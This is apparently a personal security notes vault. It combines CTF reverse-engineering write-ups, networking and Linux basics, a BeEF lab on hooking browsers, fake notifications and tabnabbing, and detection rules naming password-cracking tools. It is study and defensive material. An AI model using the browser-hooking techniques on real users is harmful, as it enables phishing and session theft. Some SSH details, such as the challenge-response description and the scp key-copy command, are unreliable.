apoorvctf{m0dul4r_4r17hm371c_15_fun_y34h}

Notes for writeup reuse

Keep solver deterministic; avoid manual extraction.
If similar tasks fail initially, brute-force combinations over:
- traversal order (row/column),
- channel order (RGB permutations),
- bit indices (0..7 per channel),
- pack bit order (big/little).
Search extracted byte streams for known flag prefix to quickly rank candidates.

[Vault: Writeups / apoorvctf2026 / ai] Kernel Recovery

Sat, 07 Mar 2026 20:27:37 GMT

Kernel Recovery Challenge Writeup (ApoorvCTF)

Challenge Overview

Category (inferred): Reverse / Forensics (image processing + linear algebra)
Given files:
- process_scalars.py
- retrieve_kernel.py
- images/flower.jpg
- images/flower_processed.jpg
- images/flower_processed.npy
Flag format: apoorvctf{...}

The challenge provides a script that builds the flag from three integer scalars:

flag = f"apoorvctf{{{d1}_{d2}_{d3}}}"

So the main task is to recover these three integers.

Initial Triage

1) Inspect helper script for flag structure

Looking at process_scalars.py immediately reveals:

It expects exactly 3 integer inputs.
It outputs apoorvctf{d1_d2_d3}.

This means we need to extract three integers from the other artifacts.

2) Inspect kernel recovery script

retrieve_kernel.py does the following:

Loads original image (flower.jpg) as RGB.
Loads processed RGB array from flower_processed.npy.
For each channel (R, G, B), reconstructs a 3x3 convolution kernel by solving:
- X * k = Y via least squares (np.linalg.lstsq), where:
  - X = flattened 3x3 input patches,
  - Y = corresponding processed pixel value.
Prints recovered kernels for red/green/blue channels.

So there are exactly three matrices, and the remaining step is to derive one scalar from each.

Solving Steps

Step 1: Run kernel recovery

Command used:

python3 retrieve_kernel.py flower.jpg flower_processed.jpg

Recovered kernels:

Red

[[ 1 -1  0]
 [-1  5 -1]
 [ 2 -1  0]]

Green

[[ 1  2  1]
 [-1  8 -1]
 [-3 -1  1]]

Blue

[[-1 -4  1]
 [ 1  4  4]
 [-1  3  1]]

Step 2: Infer what “matrix scalar” likely means

From process_scalars.py argument names:

<matrix-scalar-1> <matrix-scalar-2> <matrix-scalar-3>

In linear algebra, the most standard singular “matrix scalar” is the determinant (single scalar derived from a square matrix).

Because each recovered object is a 3x3 matrix, determinant is a natural fit.

Step 3: Compute determinants

Python snippet used:

import numpy as np

kr=np.array([[1,-1,0],[-1,5,-1],[2,-1,0]])
kg=np.array([[1,2,1],[-1,8,-1],[-3,-1,1]])
kb=np.array([[-1,-4,1],[1,4,4],[-1,3,1]])

print(round(np.linalg.det(kr)))
print(round(np.linalg.det(kg)))
print(round(np.linalg.det(kb)))

Results:

det(kr) = 1
det(kg) = 40
det(kb) = 35

So:

d1 = 1
d2 = 40
d3 = 35

Final Flag

apoorvctf{1_40_35}

Why This Works

The provided script explicitly builds flag from 3 integers.
The second script reliably reconstructs 3 channel-wise 3x3 kernels from original vs processed data.
Determinant is the canonical scalar for square matrices and cleanly produces integers.
Plugging those values into the known flag template yields a valid-format flag.

Reproducibility Checklist

From a clean copy of the challenge:

Install dependency if needed:
```
python3 -m pip install --user pillow
```

Recover kernels:

python3 retrieve_kernel.py flower.jpg flower_processed.jpg

Compute determinants (any calculator / Python / NumPy).
Build flag as apoorvctf{detR_detG_detB}.

Files Referenced

process_scalars.py
retrieve_kernel.py
images/flower.jpg
images/flower_processed.npy

[Vault: Writeups / apoorvctf2026 / re] Forge

Sat, 07 Mar 2026 09:52:37 GMT

Forge [RE] - Detailed Writeup

Challenge

Name: Forge
Category: Reverse Engineering
Given file: forge
Prompt hint: only a trinket/firmware can open the workshop

Expected flag format on platform: apoorvctf{...}.

1) Fast Triage

I started with standard binary triage.

file forge
strings -n 6 forge
readelf -h forge
readelf -S forge

Key observations:

forge is a stripped 64-bit PIE ELF.
Imports include OpenSSL primitives: EVP_sha256, EVP_aes_256_gcm, RAND_bytes, etc.
ptrace, fork, waitpid, prctl are present (anti-debug + sandbox-like behavior).
A suspicious encoded string appears in .rodata that decodes to payload.bin.

Running once:

./forge
echo $?

It exits silently with code 1.

2) Why It Exits Immediately (Anti-Debug)

I traced execution:

strace -o /tmp/forge.strace ./forge

Important line in trace:

ptrace(PTRACE_TRACEME) = -1 EPERM

So the binary intentionally fails when it detects tracing/debug context.

In assembly, main starts with:

call ptrace@plt
compare result with -1
jump to an exit routine on failure

This explains the immediate exit during tracing.

3) Static RE of Main Logic

With objdump -d -Mintel forge, the core flow is:

Anti-debug check (ptrace).
mmap executable + data regions.
Build and solve a 56x56 system over a custom finite-field multiply table.
Derive a 56-byte value from that solve.
Hash/derive keys with SHA-256.
Perform AES-256-GCM operations over 56-byte blocks.
Decode a filename by XORing bytes with 0x5a.

That filename is recovered from .rodata bytes at 0x2020:

2a 3b 23 36 35 3b 3e 64 38 33 34

XOR with 0x5a gives:

payload.bin

The program tries to open/read this file and then uses seccomp-like prctl setup and child execution flow. That path is noisy and not needed to get the flag.

4) The Important Part: Embedded Math System

Main solver uses three fixed .rodata objects:

b vector at virtual 0x2040, length 56
A matrix at virtual 0x2080, size 56*56
GF(256)-style multiply table at virtual 0x2cc0, size 256*256

In file offsets (because .rodata starts at file 0x2000):

b at 0x2040 (+0x40 in .rodata)
A at 0x2080 (+0x80)
mul at 0x2cc0 (+0xcc0)

The routine performs Gaussian elimination in that algebra:

pivot search for non-zero byte
row swaps
multiplicative inverse lookup using mul[(pivot<<8)+x] == 1
row normalization and elimination with table multiply and XOR

So this is a pure static solve: no need to emulate runtime anti-debug path.

5) Deterministic Solver Script

I wrote a reproducible extractor:

Script: forge-solve.py
It reads forge directly and reconstructs the same augmented matrix logic.

Run:

python3 forge-solve.py

Output:

APOORVCTF{Y0u_4ctually_brOught_Y0ur_owN_Firmw4re????!!!}

6) Final Flag

Raw recovered string:

APOORVCTF{Y0u_4ctually_brOught_Y0ur_owN_Firmw4re????!!!}

If platform enforces lowercase prefix format, submit:

apoorvctf{Y0u_4ctually_brOught_Y0ur_owN_Firmw4re????!!!}

Why This Works (Short Reasoning)

The binary contains all cryptographic/math material in .rodata.
Anti-debug and payload execution are defensive layers, not required for extraction.
The core secret is produced by a deterministic linear solve over the embedded GF table.
Re-implementing that solver statically reproduces the exact 56-byte flag string.

[Vault: Writeups / apoorvctf2026 / re] Requiem

Fri, 06 Mar 2026 20:20:08 GMT

Requiem [RE] - Beginner-Friendly Writeup

Challenge

We are given one file: requiem.

Goal: find the flag in format apoorvctf{...}.

1) First look at the binary

Check what kind of file it is:

file requiem

This shows a Linux 64-bit ELF executable (stripped), so reverse engineering is expected.

Make it executable and run:

chmod +x requiem
./requiem

Program output:

loading flag
printing flag.....
RETURN TO ZERO!!!!!!!!

It says it is printing the flag, but no flag appears. That means the real flag is probably decoded in memory and then erased.

2) Collect clues from strings

strings -n 6 requiem | rg -i "flag|zero|return"

This confirms those same messages are hardcoded. It also hints the author wants us to notice the "zero" behavior.

3) Manually inspect code logic

Use disassembly tools:

readelf -S requiem
objdump -d -Mintel requiem

In the important function, there is a loop that does this for each byte:

Read a byte from a constant data region (.rodata)
XOR it with 0x5a
Write it to an output buffer
Repeat for 0x2d bytes (45 bytes)

The key instruction pattern includes:

xor bpl, 0x5a

So the hidden flag is XOR-obfuscated in the binary.

4) Optional dynamic confirmation in gdb

You can catch output syscalls and inspect stack traces:

catch syscall write
run
bt

This helps confirm the program decodes bytes before writing output, then later clears memory (matching "RETURN TO ZERO!!!!!!!!").

5) Decode the bytes

From the disassembly, encoded bytes are located at file offset 0x484f4 with length 0x2d.

Use a quick Python script:

from pathlib import Path

b = Path("requiem").read_bytes()
off = 0x484f4
enc = b[off:off+0x2d]
flag = bytes(x ^ 0x5a for x in enc)
print(flag.decode())

Output:

apoorvctf{N0_M0R3_R3QU13M_1N_TH15_3XP3R13NC3}

Final Flag

apoorvctf{N0_M0R3_R3QU13M_1N_TH15_3XP3R13NC3}

Beginner Notes

If objdump output feels too large, search for known strings first, then find nearby code references.
In CTF RE, XOR is very common. If you see one-byte transforms in a loop, test XOR decode quickly.
"Looks like it prints flag but does not" usually means decode + wipe, fake output, or anti-analysis tricks.

[Vault: Networking] ARP

Sat, 21 Feb 2026 11:14:24 GMT

Address Resolution Protocol (ARP) is responsible for finding the MAC (hardware) address related to a specific IP address.

Each device within a network has a ledger to store information on, which is called a cache. In the context of ARP, this cache stores the identifiers of other devices on the network.

In order to map these two identifiers together (IP address and MAC address), ARP sends two types of messages:

ARP Request
ARP Reply When an ARP request is sent, a message is broadcasted on the network to other devices asking, "What is the mac address that owns this IP address?" When the other devices receive that message, they will only respond if they own that IP address and will send an ARP reply with its MAC address. The requesting device can now remember this mapping and store it in its ARP cache for future use.

[Vault: Tools] Browser Exploitation Framework

Wed, 04 Feb 2026 18:07:05 GMT

Browser Exploitation Framework (BeEF)

BeEF is an exploitation framework for web application testing. BeEF exploits browser vulnerabilities and interacts with one or more web browsers to launch directed command modules. Each browser can be configured in a different security context. BeEF allows you to launch a set of unique attack vectors and select specific modules in real time to target each browser and context.

XSS vulnerabilities leverage input validation weaknesses on a web application. These vulnerabilities are often used to redirect users to malicious websites to steal cookies (session tokens) and other sensitive information. BeEF is a tool that can be used to manipulate users by leveraging XSS vulnerabilities.
You can download BeEF from https://beefproject.com or https://github.com/beefproject/beef.
BeEF contains numerous command modules and uses a robust API that allows security professionals to quickly develop custom modules.
BeEF is an application that runs in your browser. It allows you to take control of target browsers that visit a malicious web page that you have created. From there, a large number of exploits can be executed that affect the target browser.

In combination with social engineering attacks such as phishing emails, BeEF is an effective tool for information gathering, distributing malware, and many other browser-based exploits. We use it to gain access to an organization’s internal network and it is really useful for illustrating the extent to which social engineering can result in very big problems!

Launching BeEF

The tool starts a web service on port 3000 by default. From there, the attacker can log in to a web console and manipulate users who are victims of XSS attacks.

BeEF Screenshot ![[attachments/2f867ab623a343cd3f8962e03f5cf46d_MD5.jpg|0x0]]

Stealing a Browser Cookie

shows a successful compromise in which the attacker has stolen the user’s session token (browser cookie) dsing XSS and BeEF

![[attachments/29cf9c5d2558c301992c09c8d8bc4827_MD5.jpg|750x613]]

Sending a Fake Notification

Once the system is compromised, the attacker can use BeEF to perform numerous attacks (including social engineering attacks). For example, the attacker can send fake notifications to the victim’s browser

![[attachments/cc2c7813713b20300420c0aa93bb04eb_MD5.jpg|815x598]]

Fake Notification in Browser

The Fake BeEF Notification in the Victim’s Browser

The Browser Exploitation Framework (BeEF) enables penetration testers to perform client-side attacks using the target’s web browser. Pentesters use BeEF to “hook” web browsers. The attacker somehow makes a user execute a JavaScript file name hook.js to take control of the user’s browser and launch further attacks against the target system from within the browser context. The malicious script can be run in various ways, including using a phishing message to make a user go to a webpage that carries the script.

Load the BeEF GUI Environment
Hook the Local Browser to Simulate a Client-Side Attack
Investigate BeEF Exploit Capabilities

Background / Scenario

In this activity, you will use BeEF to hook a local browser and perform a browser-based exploit. This activity is performed under carefully controlled conditions within a virtual environment. BeEF tools should only be used for penetration testing in situations where you have written permission to perform client-side exploits.

Required Resources

Kali VM customized for Ethical Hacker course

Part 1: Load the BeEF GUI Environment

Step 1: Start BeEF.

Open the BeEF application from the Kali Application > All Applications > beef start menu choice. The first time BeEF is run, you will be prompted to change the password for the BeEF user. Enter newbeef as the password.

$ sudo beef-xss

[sudo] password for kali:

[-] You are using the Default credentials

[-] (Password must be different from "beef")

[-] Please type a new password for the beef user: newbeef

At the end of the command output, BeEF indicates that is opening the BeEF web UI in a new browser window.

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

A browser window will open automatically. This is the BeEF interface. If it does not, open Firefox from the menu bar and enter http://127.0.0.1:3000/ui/authentication as the URL. Log in to BeEF with the username beef and the password newbeef.

Step 2: Hook the Local Browser to Simulate a Client-Side Attack.

To use BeEF to exploit a target system, you first have to “hook” the target browser. You will use the local system as the target in this lab. If you were running an actual penetration test, your reconnaissance would identify web pages that the user may visit often, as in a watering hole attack. You would use one of the commonly visited web pages to deliver the “beef hook” JavaScript code. In this lab, you will use a demo web page that is included with the BeEF application.

Open a new tab in your Firefox browser. Enter the URL http://127.0.0.1:3000/demos/butcher/index.html.

The fake web page resembles a simple storefront app. It contains JavaScript code which will run in the browser environment when the page is loaded.

Use CTRL-U in Firefox to view the source code for the HTML page that is displayed.

Which lines in the HTML source will load and run the code to create the “beef hook”?

Answer Area

Lines 31 through 34

Hide Answer

Return to the browser window that contains the BeEF Control Panel. Notice that the information in the Hooked Browsers panel on the left side of the screen has changed.
Click the entry listed under Online Browsers.

What are the six tabs that appear under the Current Browser choice?

Answer Area

Details, Logs, Commands, Proxy, XssRays, Network.

Hide Answer

Open the Details tab. What information does BeEF know about the target user’s computer and browser? Why is this information interesting?

Answer Area

The browser type, version, operating system, and installed plugins. This is interesting because additional vulnerabilities may be associated with these items.

Hide Answer

Part 2: Investigate BeEF Exploit Capabilities

Step 1: Investigate the Commands and Network Tabs.

In this step, you will investigate two of the tabs that appear for the hooked internal browser. Use the internet to research the capabilities of the other tabs.

Click the Commands tab. This tab is where modules can be executed against the target browser. Expand the command categories in the Module Tree pane. Notice the color-coded icons next to each function. These icons are referred to as “traffic lights”.

Each command module has a traffic light icon, which is used to indicate the following:

Green The command module works against the target and should be invisible to the user.

Orange The command module works against the target but may be visible to the user.

White The command module is yet to be verified against this target.

Red The command module does not work against this target.

Under which command category do you find the module to Detect Antivirus? Which traffic light icon does the Detect Antivirus module have?

Answer Area

Host category. Green icon.

Hide Answer

Note: The Module Tree search box acts as a filter. If you use the search box to find a command, you must clear your search terms from the box to see the entire tree again.

Click the Network tab. The BeEF console creates a network map displaying the current network topology. The other tabs in this category are Hosts and Services. Because you are working in a local environment only, the network map will only show one network and one host.

Step 2: Use BeEF to Initiate a Social Engineering Attack.

In this step, you will send a fake alert message to the hooked browser window to entice the user to download and install a malicious plug-in.

Click the Commands tab in the BeEF Control Panel. Scroll down to the Social Engineering category. Open the category. Select the Fake Notification Bar (Firefox) choice from the module list. The default URL for the malicious plug-in is listed along with the message that will be shown on the browser window. The exploit will cause an alert to display on the browser. If the user clicks the install button for the fake plug-in, they will be directed to the URL listed.

What is the default message that the alert displays?

Answer Area

“An additional plug-in is required to display some elements on this page.”

Hide Answer

Have you ever seen fake notifications like this when you are browsing the web?

Answer Area

Fake tech support or virus detection notifications are commonly used by malicious or hacked websites.

Hide Answer

Change Plugin URL to http://10.6.6.13/. This URL redirects the user to the login screen for the DVWA virtual server. The URL can point to any webpage, either locally stored or on the network. In a live penetration testing environment, this would be a cloned website, a malicious application download, or a webpage containing a malicious script.
Change the alert text to say AdBlocker Security Extension is out of date. Install the new version now. Click Execute to send the alert to the hooked browser window.
Return to the browser tab that displays The Butcher fake web page. An alert message is on the Firefox banner area. Click the Install Plug-in button on the alert banner.

What happens when you click the Install Plug-in button?

Answer Area

You are redirected to the DVWA login screen.

Hide Answer

What is the significance of this?

Answer Area

The browser is hijacked and forced to go to what could be a malicious website that will download malware to the target computer.

Hide Answer

Close the Firefox browser.

Step 3: Use TabNabbing to Display Malicious Website

TabNabbing is a function that redirects the user to a different URL if a browser tab of a hooked browser is idle for a specified length of time.

Open a new instance of Firefox. Navigate to the BeEF login screen using the URL http://127.0.0.1:3000/ui/authentication. Log in with the username of beef and the password of newbeef.
Open a new tab and navigate back to The Butcher web page at http://127.0.0.1:3000/demos/butcher/index.html.
Return to the BeEF Control Panel tab. Select the instance listed under the Online Browsers in the Hooked Browsers panel. Open the Commands tab.
Expand the Social Engineering category. Scroll down and select TabNabbing.

What is the default wait time before the page in the browser changes to the one specified in the URL field?

Answer Area

15 minutes

Hide Answer

Change the number of minutes to 1. Click the Execute button to start the exploit. Remain idle for at least one minute.
Return to the tab that displayed The Butcher web page.

What page is displayed in the tab now?

Answer Area

The BeEF Basic Demo page.

Hide Answer

In the box at the center of the BeEF Basic Demo screen, type “This is my secret”. Return to the BeEF Control Panel tab. With the entry under Online Browsers selected, select Logs from the menu bar.

BeEF logs activity performed in the hooked browser. The text collected in the Basic Demo screen is displayed in clear text. All activity, including mouse clicks and navigation are recorded in the logs.

Reflection

In an earlier lab, you were introduced to the Social Engineer Toolkit (SET). How might the SET and BeEF be used in combination to perform a social engineering penetration test?

Answer Area

Answers will vary. SET enables easy website cloning and input capture, BeEF enables command and control of the target’s browser. They can be used together to create both server-side and client-side exploits.

[Vault: System Security] OS basics

Mon, 12 Jan 2026 17:18:44 GMT

Operating System

The interface between the computer hardware and the user

The job of an OS is to help other computer programs run efficiently. Applications send requests to the operating system, and the operating system directs those requests to the hardware. The hardware also sends information back to the operating system, and the operating system sends it back to applications.

Booting the computer

When you boot, or turn on, your computer, either a BIOS or UEFI microchip is activated. The Basic Input/Output System (BIOS) is a microchip that contains loading instructions for the computer and is prevalent in older systems. The Unified Extensible Firmware Interface (UEFI) is a microchip that contains loading instructions for the computer and replaces BIOS on more modern systems. The last instruction from the BIOS or UEFI activates the bootloader. The bootloader is a software program that boots the operating system. Once the operating system has finished booting, your computer is ready for use.

Virtual Machines

A virtual machine (VM) is a virtual version of a physical computer. Benefits:

Security
Efficiency Hypervisors help users manage multiple virtual machines and connect the virtual and physical hardware. Hypervisors also help with allocating the shared resources of the physical host machine to one or more virtual machines. Kernel-based Virtual Machine (KVM) is an open-source hypervisor that is supported by most major Linux distributions. It is built into the Linux kernel, which means it can be used to create virtual machines on any machine running a Linux operating system without the need for additional software.

UI

A user interface is a program that allows a user to control the functions of the operating system. A GUI (graphical user interface) is a user interface that uses icons on the screen to manage different tasks on the computer. Basic GUI components • Start menu • Task bar • Desktop with icons and shortcuts The CLI (command-line interface) is a text-based user interface that uses commands to interact with the computer. These commands communicate with the operating system and execute tasks like opening programs. The command-line interface allows for customization, which lets you complete multiple tasks simultaneously.

Linux

Linux is an open-source operating system. It was created in two parts. In the early 1990s, two different people were working separately on projects to improve computer engineering. The first person was Linus Torvalds. At the time, the UNIX operating system was already in use. He wanted to improve it and make it open source and accessible to anyone. What was revolutionary was his introduction of the Linux kernel. We're going to learn what the kernel does later. Around the same time, Richard Stallman started working on GNU. GNU was also an operating system based on UNIX. Stallman shared Torvalds' goal of creating software that was free and open to anyone. After working on GNU for a few years, the missing element for the software was a kernel. Together, Torvalds' and Stallman’s innovations made what is commonly referred to as Linux.

Linux Architecture

User

The user is the person interacting with a computer. They initiate and manage computer tasks. Linux is a multi-user system, which means that multiple users can use the same resources at the same time.

Applications

An application is a program that performs a specific task. A package manager is a tool that helps users install, manage, and remove packages or applications. A package is a piece of software that can be combined with other packages to form an application.

Shell

The shell is the command-line interpreter. Everything entered into the shell is text based. The shell allows users to give commands to the kernel and receive responses from it. You can think of the shell as a translator between you and your computer. The shell translates the commands you enter so that the computer can perform the tasks you want.

Filesystem Hierarchy Standard (FHS)

The Filesystem Hierarchy Standard (FHS) is the component of the Linux OS that organizes data. It specifies the location where data is stored in the operating system. A directory is a file that organizes where other files are stored. Directories are sometimes called “folders,” and they can contain files or other directories. The FHS defines how directories, directory contents, and other storage is organized so the operating system knows where to find specific data.

Kernel

The kernel is the component of the Linux OS that manages processes and memory. It communicates with the applications to route commands. The Linux kernel is unique to the Linux OS and is critical for allocating resources in the system. The kernel controls all major functions of the hardware, which can help get tasks expedited more efficiently.

Hardware

The hardware is the physical components of a computer. Peripheral devices are hardware components that are attached and controlled by the computer system. Internal hardware are the components required to run the computer. : MB,CPU,RAM,HDD.

Kali Linux

KALI LINUX™ is a trademark of Offensive Security and is Debian derived. This open-source distro was made specifically with penetration testing and digital forensics in mind Penetration testing tools: Metaasploit,Burp Suite, John the Ripper Digital Forensics tools: Wireshark, tcpdump,Autopsy

Package Managers

A package is a piece of software that can be combined with other packages to form an application. Some packages may be large enough to form applications on their own. Packages contain the files necessary for an application to be installed. These files include dependencies, which are supplemental files used to run an application. A package manager is a tool that helps users install, manage, and remove packages or applications. Linux uses multiple package managers.

Types of package managers

Certain package managers work with certain distributions. For example, the Red Hat Package Manager (RPM) can be used for Linux distributions derived from Red Hat, and package managers such as dpkg can be used for Linux distributions derived from Debian. Different package managers typically use different file extensions. For example, Red Hat Package Manager (RPM) has files which use the .rpm file extension, such as Package-Version-Release_Architecture.rpm. Package managers for Debian-derived Linux distributions, such as dpkg, have files which use the .deb file extension, such as Package_Version-Release_Architecture.deb.

Package management tools

In addition to package managers like RPM and dpkg, there are also package management tools that allow you to easily work with packages through the shell. Package management tools are sometimes utilized instead of package managers because they allow users to more easily perform basic tasks, such as installing a new package. Two notable tools are the Advanced Package Tool (APT) and Yellowdog Updater Modified (YUM).

Advanced Package Tool (APT)

APT is a tool used with Debian-derived distributions. It is run from the command-line interface to manage, search, and install packages.

Yellowdog Updater Modified (YUM)

YUM is a tool used with Red Hat-derived distributions. It is run from the command-line interface to manage, search, and install packages. YUM works with .rpm files.

Shell

shell is the command-line interpreter. You can think of a shell as a translator between you and the computer system.

Types of shells

The many different types of Linux shells include the following:

Bourne-Again Shell (bash)
C Shell (csh)
Korn Shell (ksh)
Enhanced C shell (tcsh)
Z Shell (zsh)

Input and output in the shell

Standard input: information received by the OS via the command line. String data is data consisting of an ordered sequence of characters. Standard output: information returned by the OS through the shell. Standard error: contains error messages returned by the OS through the shell.

Filesystem Hierarchy Standard (FHS)

Filesystem Hierarchy Standard (FHS) is the component of Linux that organizes data. The FHS is important because it defines how directories, directory contents, and other storage is organized in the operating system. A file path is the location of a file or directory. In the file path, the different levels of the hierarchy are separated by a forward slash (/).

Root directory

The root directory is the highest-level directory in Linux, and it’s always represented with a forward slash (/). All subdirectories branch off the root directory. Subdirectories can continue branching out to as many levels as necessary.

Standard FHS directories

/home: Each user in the system gets their own home directory.
/bin: This directory stands for “binary” and contains binary files and other executables. Executables are files that contain a series of commands a computer needs to follow to run programs and perform other functions.
/etc: This directory stores the system’s configuration files.
/tmp: This directory stores many temporary files. The /tmp directory is commonly used by attackers because anyone in the system can modify data in these files.
/mnt: This directory stands for “mount” and stores media, such as USB drives and hard drives.

User-specific subdirectories

Under home are subdirectories for specific users. Each user has their own personal subdirectories. Note: When the path leads to a subdirectory below the user’s home directory, the user’s home directory can be represented as the tilde (~). The absolute file path is the full file path, which starts from the root. The relative file path is the file path that starts from a user's current directory.

[[Shell Commands]]
[[Linux File permissions and ownership]]

[[Linux authentication and authorization]]

[Vault: System Security] Detection of cracking

Sun, 04 Jan 2026 16:20:27 GMT

Offline cracking does not hit login services, so lockouts and failed logon dashboards stay quiet. We can detect the work where it runs, on endpoints and jump boxes. The important signals to monitor include:

Process creation: Password cracking has a small set of well-known binaries and command patterns that we can look out for. A mix of process events, file activity, GPU signals, and network touches tied to tooling and wordlists. Our goal is to make the activity obvious without drowning in noise.

Binaries and aliases: john, hashcat, fcrackzip, pdfcrack, zip2john, pdf2john.pl, 7z, qpdf, unzip, 7za, perl invoking pdf2john.pl.
Command‑line traits: --wordlist, -w, --rules, --mask, -a 3, -m in Hashcat, references to rockyou.txt, SecLists, zip2john, pdf2john.
Potfiles and state: ~/.john/john.pot, .hashcat/hashcat.potfile, john.rec.

It's worth noting that on Windows systems, Sysmon Event ID 1 captures process creation with full command line properties, while on Linux, auditd, execve, or EDR sensors capture binaries and arguments.

GPU and Resource Artefacts

GPU cracking is loud. Sudden high utilisation on hosts can be picked up and would need to be investigated.

nvidia-smi shows long‑running processes named hashcat or john.
High, steady GPU utilisation and power draw while the fan curve spikes.
Libraries loaded: nvcuda.dll, OpenCL.dll, libcuda.so, amdocl64.dll.

Network Hints, Light but Useful

Offline cracking does not need the network once wordlists are present. Yet most operators fetch lists and tools first.

Downloads of large text files named rockyou.txt, or Git clones of popular wordlist repos.
Package installs, for example apt install john hashcat, detected by EDR package telemetry.
Tool updates and driver fetches for GPU runtimes.

Unusual File Reads

Repeated reads of files such as wordlists or encrypted files would need analysis.

Detections

Below are some examples of detection rules and hunting queries we can put to use across various environments.

Sysmon:

 EventID=1
(ProcessName="C:\Program Files\john\john.exe" OR
 ProcessName="C:\Tools\hashcat\hashcat.exe" OR
 CommandLine="*pdf2john.pl*" OR
 CommandLine="*zip2john*")

Linux audit rules, temporary for an investigation:

auditctl -w /usr/share/wordlists/rockyou.txt -p r -k wordlists_read
auditctl -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/john -k crack_exec
auditctl -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/hashcat -k crack_exec

Sigma style rule, Windows process create for cracking tools:

title: Password Cracking Tools Execution
id: 9f2f4d3e-4c16-4b0a-bb3a-7b1c6c001234
status: experimental
logsource:
  product: windows
  category: process_creation
detection:
  selection_name:
    Image|endswith:
      - '\john.exe'
      - '\hashcat.exe'
      - '\fcrackzip.exe'
      - '\pdfcrack.exe'
      - '\7z.exe'
      - '\qpdf.exe'
  selection_cmd:
    CommandLine|contains:
      - '--wordlist'
      - 'rockyou.txt'
      - 'zip2john'
      - 'pdf2john'
      - '--mask'
      - ' -a 3'
  condition: selection_name or selection_cmd
level: medium

[Vault: Linux] ssh

Sun, 28 Dec 2025 18:46:56 GMT

SSH (Secure Shell) is a cryptographic network protocol used to securely access and manage a remote computer over an unsecured network. It was developed as a secure replacement for older, unencrypted protocols like Telnet and FTP.

The basic syntax for connecting is: ssh username@remote_host_address

Example: ssh john@192.168.1.50
With a custom port: ssh -p 2222 john@192.168.1.50
Run a remote command: ssh user@host "whoami"
Copying a file (SCP): scp localfile.txt john@remote:/path/to/destination

Key Features

Encryption: All data sent over the connection (including passwords) is encrypted, protecting it from "packet sniffing" or eavesdropping.
Authentication: Verifies the identity of both the server and the user to prevent "man-in-the-middle" attacks.
Port 22: By default, SSH listens on TCP port 22.
Data Integrity: Uses hashing algorithms (like SHA-2) to ensure that data is not tampered with during transit.

How it Works (The Handshake)

When you connect to a server, SSH goes through a multi-stage process:

TCP Handshake: A standard connection is established between the client and server.
Negotiation: Both sides agree on which encryption and hashing versions to use.
Key Exchange (Diffie-Hellman): They securely generate a "shared secret" key to encrypt the session. This happens without actually sending the key over the network.
Authentication: The server verifies the user via a password or, more securely, SSH Keys.

Authentication Methods

| Method | Description | Security Level | | ------------ | ---------------------------------------------------------------------------------------------------------- | ---------------------------------------- | | Password | Standard username and password login. | Moderate (vulnerable to brute-force) | | SSH Keys | Uses a cryptographic pair: a Public Key (on the server) and a Private Key (on your local machine). | High (recommended) |

SSH Key based auth

SSH Key Authentication relies on Asymmetric Cryptography (or Public-Key Cryptography).

Key Components

Identity Key (Private Key): The secret half of the asymmetric pair, typically stored on the client in ~/.ssh/id_rsa or ~/.ssh/id_ed25519. It must have restricted filesystem permissions (usually 600).
Authorized Key (Public Key): The non-secret half, appended to the ~/.ssh/authorized_keys file on the remote server.
Passphrase: An optional string used to encrypt the private key at rest (using a symmetric cipher like AES) (requiring "something you know" to unlock "something you have").
Key Fingerprint: A unique hash (e.g., SHA256) of the public key used to verify identities quickly without comparing the entire key string.

The Authentication Flow (Challenge-Response)

Rather than sending the private key to the server, SSH uses a Challenge-Response mechanism to prove ownership.

Identity Offer: The client sends the Public Key ID (or the public key itself) to the server, requesting to authenticate with it.
Key Validation: The server checks its authorized_keys file for a match. If found, it generates a Random Challenge (a unique blob of data).
The Challenge: The server encrypts this challenge using the user's Public Key and sends the ciphertext to the client.
The Decryption: The client decrypts the challenge using its local Private Key to retrieve the original random data.
The Signature: The client combines this decrypted data with the Session ID (negotiated during the initial Diffie-Hellman exchange) and signs it using its private key to create a Digital Signature.
Verification: The server uses the public key to verify the signature. If the signature is valid, it proves the client possesses the matching private key, and the session is authenticated.

Algorithms used

| Algorithm | Technical Basis | Key Size | Recommended Status | | ------------- | ------------------------------------------------- | ---------------- | ---------------------------------------- | | Ed25519 | EdDSA (Edwards-curve Digital Signature Algorithm) | 256 bits | Best (Fast, secure, small keys) | | ECDSA | Elliptic Curve Digital Signature Algorithm | 256/384/521 bits | Good (Modern, but NIST-standardized) | | RSA | Integer Factorization (Prime numbers) | 2048 - 4096 bits | Legacy (Use 3072-bit or higher) | | DSA | Discrete Logarithm Problem | 1024 - 4096 bits | Deprecated (Insecure/Weak) |

Generating SSH keys

The Ed25519 algorithm is the current industry standard because it is faster and more secure than RSA.

ssh-keygen -t ed25519 -C "your_email@example.com"

-t ed25519: Specifies the Cryptographic Algorithm Type. Ed25519 uses Elliptic Curve cryptography.
-C "comment": Adds a Metadata Label (usually an email) to the end of the public key file to help you identify it later. You will be prompted to select a file location (accept the default ~/.ssh/id_rsa) and enter a passphrase for extra security. Using a passphrase is recommended, though it can be left empty for automation purposes.

Once generated, two files are created in your ~/.ssh/ directory: id_ed25519 the private key and id_ed25519.pub the public key

If you are connecting to a very old legacy server that doesn't support Ed25519, use RSA with a minimum of 4096 bits:

ssh-keygen -t rsa -b 4096 -C "your_email@example.com"

Transfering keys

To transfer your public key to a remote server, you use the Key Exchange process. This ensures that your public key is placed in the correct location with the required filesystem permissions.

The most reliable way to do this is using the ssh-copy-id script. It automatically handles logging in, creating the .ssh directory if it doesn't exist, and appending your key to the authorized_keys file.

ssh-copy-id -i ~/.ssh/id_ed25519.pub username@remote_host

-i: Specifies the Identity File (the public key) you wish to upload.
Result: Your public key is appended to ~/.ssh/authorized_keys on the server.

OR using scp: scp id_rsa.pub root@homeservername:/home/username/.ssh/authorised_keys

Advanced Management Terms

SSH Agent: A background process (ssh-agent) that holds decrypted identity keys in memory, allowing for Single Sign-On (SSO) across multiple sessions without re-entering passphrases.
- To start the agent: eval "$(ssh-agent -s)"
- To add your key: ssh-add ~/.ssh/id_ed25519
- You only type the passphrase once here. Future SSH connections in that session will be automatic
Agent Forwarding: A mechanism (ssh -A) that allows a remote server to use your local SSH agent to authenticate against a third machine (e.g., jumping from a Bastion host to a private DB).
Known Hosts: A file (~/.ssh/known_hosts) on the client that stores the Host Keys of servers to prevent Man-in-the-Middle (MITM) attacks by ensuring the server identity hasn't changed.
ssh_config (Client): Located at ~/.ssh/config. Allows you to create Aliases for servers, pre-define ports, and specify which key to use for which host.
